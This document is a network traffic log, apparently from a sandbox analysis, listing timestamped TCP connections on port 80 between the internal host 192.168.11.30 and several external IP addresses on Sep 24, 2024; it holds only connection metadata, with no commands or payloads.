                                              Sep 24, 2024 11:26:35.872987032 CEST4989680192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:26:36.890875101 CEST4989780192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:26:37.204076052 CEST8049897206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:26:37.204381943 CEST4989780192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:26:37.210061073 CEST4989780192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:26:37.523089886 CEST8049897206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:26:37.629518986 CEST8049897206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:26:37.629836082 CEST4989780192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:26:37.632057905 CEST4989780192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:26:37.944915056 CEST8049897206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:26:42.757222891 CEST4989880192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:42.927865028 CEST8049898209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:42.928121090 CEST4989880192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:42.938011885 CEST4989880192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:43.108880043 CEST8049898209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:43.121496916 CEST8049898209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:43.121618986 CEST8049898209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:43.121687889 CEST8049898209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:43.121746063 CEST8049898209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:43.121807098 CEST8049898209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:43.121864080 CEST8049898209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:43.121891022 CEST4989880192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:43.121923923 CEST8049898209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:43.121953964 CEST4989880192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:43.121990919 CEST8049898209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:43.122210026 CEST8049898209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:43.122276068 CEST8049898209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:43.122383118 CEST4989880192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:43.122447968 CEST8049898209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:43.122545958 CEST4989880192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:43.122620106 CEST4989880192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:44.449260950 CEST4989880192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:45.467211962 CEST4989980192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:45.636691093 CEST8049899209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:45.636914968 CEST4989980192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:45.645634890 CEST4989980192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:45.814188957 CEST8049899209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:45.823584080 CEST8049899209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:45.823601007 CEST8049899209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:45.823708057 CEST8049899209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:45.823724985 CEST8049899209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:45.823765039 CEST4989980192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:45.823827028 CEST8049899209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:45.823906898 CEST4989980192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:45.823913097 CEST8049899209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:45.824019909 CEST8049899209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:45.824033976 CEST8049899209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:45.824063063 CEST4989980192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:45.824192047 CEST8049899209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:45.824193001 CEST4989980192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:45.824306011 CEST8049899209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:45.824393988 CEST8049899209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:45.824491978 CEST4989980192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:45.824557066 CEST4989980192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:47.151720047 CEST4989980192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:48.169564962 CEST4990080192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:48.339942932 CEST8049900209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:48.340167046 CEST4990080192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:48.349849939 CEST4990080192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:48.520278931 CEST8049900209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:48.520299911 CEST8049900209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:48.520311117 CEST8049900209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:48.534060001 CEST8049900209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:48.534099102 CEST8049900209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:48.534120083 CEST8049900209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:48.534140110 CEST8049900209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:48.534158945 CEST8049900209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:48.534178972 CEST8049900209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:48.534395933 CEST4990080192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:48.534615993 CEST8049900209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:48.534758091 CEST8049900209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:48.534909010 CEST8049900209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:48.534948111 CEST8049900209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:48.534965038 CEST4990080192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:48.534969091 CEST8049900209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:48.535123110 CEST4990080192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:49.854268074 CEST4990080192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:50.872808933 CEST4990180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:51.041441917 CEST8049901209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:51.041631937 CEST4990180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:51.047904015 CEST4990180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:51.215991020 CEST8049901209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:51.228213072 CEST8049901209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:51.228353977 CEST8049901209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:51.228425026 CEST8049901209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:51.228566885 CEST8049901209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:51.228632927 CEST8049901209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:51.228722095 CEST8049901209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:51.228749037 CEST4990180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:51.228781939 CEST8049901209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:51.228822947 CEST4990180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:51.228838921 CEST8049901209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:51.228895903 CEST8049901209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:51.228952885 CEST8049901209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:51.228964090 CEST4990180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:51.229015112 CEST8049901209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:51.229094028 CEST4990180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:51.229147911 CEST4990180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:51.229266882 CEST4990180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:51.233035088 CEST4990180192.168.11.30209.74.95.29
                                              Sep 24, 2024 11:26:51.401258945 CEST8049901209.74.95.29192.168.11.30
                                              Sep 24, 2024 11:26:56.407946110 CEST4990280192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:26:56.754312992 CEST804990213.76.137.44192.168.11.30
                                              Sep 24, 2024 11:26:56.754625082 CEST4990280192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:26:56.764674902 CEST4990280192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:26:57.110790968 CEST804990213.76.137.44192.168.11.30
                                              Sep 24, 2024 11:26:57.293325901 CEST804990213.76.137.44192.168.11.30
                                              Sep 24, 2024 11:26:57.293399096 CEST804990213.76.137.44192.168.11.30
                                              Sep 24, 2024 11:26:57.293679953 CEST4990280192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:26:58.274159908 CEST4990280192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:26:59.291760921 CEST4990380192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:26:59.625891924 CEST804990313.76.137.44192.168.11.30
                                              Sep 24, 2024 11:26:59.626198053 CEST4990380192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:26:59.635881901 CEST4990380192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:26:59.969594955 CEST804990313.76.137.44192.168.11.30
                                              Sep 24, 2024 11:27:00.156910896 CEST804990313.76.137.44192.168.11.30
                                              Sep 24, 2024 11:27:00.156985044 CEST804990313.76.137.44192.168.11.30
                                              Sep 24, 2024 11:27:00.157182932 CEST4990380192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:27:01.148619890 CEST4990380192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:27:02.166380882 CEST4990480192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:27:02.502671003 CEST804990413.76.137.44192.168.11.30
                                              Sep 24, 2024 11:27:02.502948999 CEST4990480192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:27:02.511591911 CEST4990480192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:27:02.847558975 CEST804990413.76.137.44192.168.11.30
                                              Sep 24, 2024 11:27:02.847628117 CEST804990413.76.137.44192.168.11.30
                                              Sep 24, 2024 11:27:02.847672939 CEST804990413.76.137.44192.168.11.30
                                              Sep 24, 2024 11:27:02.847717047 CEST804990413.76.137.44192.168.11.30
                                              Sep 24, 2024 11:27:03.030097008 CEST804990413.76.137.44192.168.11.30
                                              Sep 24, 2024 11:27:03.030164957 CEST804990413.76.137.44192.168.11.30
                                              Sep 24, 2024 11:27:03.030402899 CEST4990480192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:27:04.022896051 CEST4990480192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:27:05.041328907 CEST4990580192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:27:05.387317896 CEST804990513.76.137.44192.168.11.30
                                              Sep 24, 2024 11:27:05.387496948 CEST4990580192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:27:05.394922018 CEST4990580192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:27:05.740191936 CEST804990513.76.137.44192.168.11.30
                                              Sep 24, 2024 11:27:05.922755957 CEST804990513.76.137.44192.168.11.30
                                              Sep 24, 2024 11:27:05.922769070 CEST804990513.76.137.44192.168.11.30
                                              Sep 24, 2024 11:27:05.923150063 CEST4990580192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:27:05.926230907 CEST4990580192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:27:06.271503925 CEST804990513.76.137.44192.168.11.30
                                              Sep 24, 2024 11:27:11.050060034 CEST4990680192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:11.151793957 CEST80499063.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:11.151953936 CEST4990680192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:11.162286997 CEST4990680192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:11.264252901 CEST80499063.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:11.269635916 CEST80499063.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:11.269795895 CEST4990680192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:12.677124023 CEST4990680192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:12.778876066 CEST80499063.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:13.696024895 CEST4990780192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:13.797852039 CEST80499073.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:13.798037052 CEST4990780192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:13.815155983 CEST4990780192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:13.917066097 CEST80499073.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:13.918598890 CEST80499073.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:13.918751955 CEST4990780192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:15.317284107 CEST4990780192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:15.419087887 CEST80499073.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:16.336138010 CEST4990880192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:16.437967062 CEST80499083.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:16.438186884 CEST4990880192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:16.448823929 CEST4990880192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:16.448841095 CEST4990880192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:16.550751925 CEST80499083.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:16.550765991 CEST80499083.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:16.550807953 CEST80499083.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:16.550817966 CEST80499083.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:16.552809000 CEST80499083.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:16.552958012 CEST4990880192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:17.957197905 CEST4990880192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:18.058996916 CEST80499083.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:18.975608110 CEST4990980192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:19.077534914 CEST80499093.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:19.077707052 CEST4990980192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:19.085753918 CEST4990980192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:19.187592983 CEST80499093.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:19.190804005 CEST80499093.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:19.190814972 CEST80499093.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:19.191140890 CEST4990980192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:19.194174051 CEST4990980192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:19.196249962 CEST80499093.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:19.196485043 CEST4990980192.168.11.303.33.130.190
                                              Sep 24, 2024 11:27:19.296019077 CEST80499093.33.130.190192.168.11.30
                                              Sep 24, 2024 11:27:32.497654915 CEST4991080192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:27:32.650923014 CEST8049910172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:27:32.651197910 CEST4991080192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:27:32.662895918 CEST4991080192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:27:32.816239119 CEST8049910172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:27:32.816767931 CEST8049910172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:28:58.046561003 CEST804993262.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:58.046574116 CEST804993262.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:58.047177076 CEST804993262.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:58.047204971 CEST804993262.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:58.047282934 CEST804993262.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:58.047295094 CEST804993262.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:58.047378063 CEST804993262.149.128.40192.168.11.30
                                              Sep 24, 2024 11:28:58.047431946 CEST4993280192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:58.047473907 CEST4993280192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:58.047672033 CEST4993280192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:28:59.356118917 CEST4993280192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:29:00.374317884 CEST4993380192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:29:00.581290007 CEST804993362.149.128.40192.168.11.30
                                              Sep 24, 2024 11:29:00.581482887 CEST4993380192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:29:00.588927031 CEST4993380192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:29:00.796921968 CEST804993362.149.128.40192.168.11.30
                                              Sep 24, 2024 11:29:00.797023058 CEST804993362.149.128.40192.168.11.30
                                              Sep 24, 2024 11:29:00.797038078 CEST804993362.149.128.40192.168.11.30
                                              Sep 24, 2024 11:29:00.797051907 CEST804993362.149.128.40192.168.11.30
                                              Sep 24, 2024 11:29:00.797074080 CEST804993362.149.128.40192.168.11.30
                                              Sep 24, 2024 11:29:00.797452927 CEST4993380192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:29:00.800730944 CEST4993380192.168.11.3062.149.128.40
                                              Sep 24, 2024 11:29:01.007610083 CEST804993362.149.128.40192.168.11.30
                                              Sep 24, 2024 11:29:05.928232908 CEST4993480192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:06.029992104 CEST80499343.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:06.030193090 CEST4993480192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:06.039757013 CEST4993480192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:06.141570091 CEST80499343.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:06.143263102 CEST80499343.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:06.143399954 CEST4993480192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:07.541749954 CEST4993480192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:07.643564939 CEST80499343.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:08.560262918 CEST4993580192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:08.662225962 CEST80499353.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:08.662482023 CEST4993580192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:08.673413038 CEST4993580192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:08.775228977 CEST80499353.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:08.777420044 CEST80499353.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:08.777550936 CEST4993580192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:10.181726933 CEST4993580192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:10.283967972 CEST80499353.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:11.200329065 CEST4993680192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:11.302138090 CEST80499363.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:11.302408934 CEST4993680192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:11.312988043 CEST4993680192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:11.313014984 CEST4993680192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:11.415359974 CEST80499363.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:11.415373087 CEST80499363.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:11.415381908 CEST80499363.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:11.415390968 CEST80499363.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:11.416925907 CEST80499363.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:11.417043924 CEST4993680192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:12.821830988 CEST4993680192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:12.923924923 CEST80499363.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:13.840141058 CEST4993780192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:14.852499008 CEST4993780192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:14.954333067 CEST80499373.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:14.954539061 CEST4993780192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:14.967987061 CEST4993780192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:15.069884062 CEST80499373.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:15.073584080 CEST80499373.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:15.073596001 CEST80499373.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:15.073930979 CEST4993780192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:15.080501080 CEST4993780192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:15.081341982 CEST80499373.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:15.081479073 CEST4993780192.168.11.303.33.130.190
                                              Sep 24, 2024 11:29:15.182336092 CEST80499373.33.130.190192.168.11.30
                                              Sep 24, 2024 11:29:20.322920084 CEST4993880192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:20.763868093 CEST8049938154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:20.764029980 CEST4993880192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:20.777054071 CEST4993880192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:21.217978954 CEST8049938154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:21.218245983 CEST8049938154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:21.218259096 CEST8049938154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:21.218451023 CEST4993880192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:22.288363934 CEST4993880192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:23.307447910 CEST4993980192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:23.621095896 CEST8049939154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:23.621268988 CEST4993980192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:23.632505894 CEST4993980192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:23.946290970 CEST8049939154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:23.946474075 CEST8049939154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:23.946486950 CEST8049939154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:23.946691036 CEST4993980192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:25.147043943 CEST4993980192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:26.166085005 CEST4994080192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:26.597853899 CEST8049940154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:26.598073959 CEST4994080192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:26.611701012 CEST4994080192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:26.611759901 CEST4994080192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:27.043600082 CEST8049940154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:27.043612957 CEST8049940154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:27.043637037 CEST8049940154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:27.043819904 CEST8049940154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:27.043833017 CEST8049940154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:27.043956041 CEST4994080192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:28.115129948 CEST4994080192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:29.134234905 CEST4994180192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:29.450326920 CEST8049941154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:29.450479984 CEST4994180192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:29.457438946 CEST4994180192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:29.773603916 CEST8049941154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:29.773740053 CEST8049941154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:29.773755074 CEST8049941154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:29.774051905 CEST4994180192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:29.776875973 CEST4994180192.168.11.30154.212.219.2
                                              Sep 24, 2024 11:29:30.092967033 CEST8049941154.212.219.2192.168.11.30
                                              Sep 24, 2024 11:29:35.166361094 CEST4994280192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:35.480775118 CEST8049942206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:35.481132984 CEST4994280192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:35.490955114 CEST4994280192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:35.805438995 CEST8049942206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:35.805591106 CEST8049942206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:35.806149006 CEST4994280192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:37.003770113 CEST4994280192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:38.022341013 CEST4994380192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:38.335192919 CEST8049943206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:38.335427999 CEST4994380192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:38.345809937 CEST4994380192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:38.658792019 CEST8049943206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:38.658900023 CEST8049943206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:38.659068108 CEST4994380192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:39.846920013 CEST4994380192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:40.865267038 CEST4994480192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:41.180237055 CEST8049944206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:41.180406094 CEST4994480192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:41.190337896 CEST4994480192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:41.190356970 CEST4994480192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:41.505285025 CEST8049944206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:41.505441904 CEST8049944206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:41.505600929 CEST8049944206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:41.505722046 CEST4994480192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:42.705632925 CEST4994480192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:43.723862886 CEST4994580192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:44.042311907 CEST8049945206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:44.042475939 CEST4994580192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:44.048887968 CEST4994580192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:44.367330074 CEST8049945206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:44.367574930 CEST8049945206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:44.367826939 CEST4994580192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:44.370646000 CEST4994580192.168.11.30206.119.82.147
                                              Sep 24, 2024 11:29:44.688980103 CEST8049945206.119.82.147192.168.11.30
                                              Sep 24, 2024 11:29:52.465756893 CEST4994680192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:29:52.599802971 CEST8049946208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:29:52.600204945 CEST4994680192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:29:52.607949972 CEST4994680192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:29:52.747982979 CEST8049946208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:29:53.083487988 CEST8049946208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:29:53.083523989 CEST8049946208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:29:53.083539009 CEST8049946208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:29:53.083553076 CEST8049946208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:29:53.083734989 CEST4994680192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:29:53.083997011 CEST4994680192.168.11.30208.91.197.27
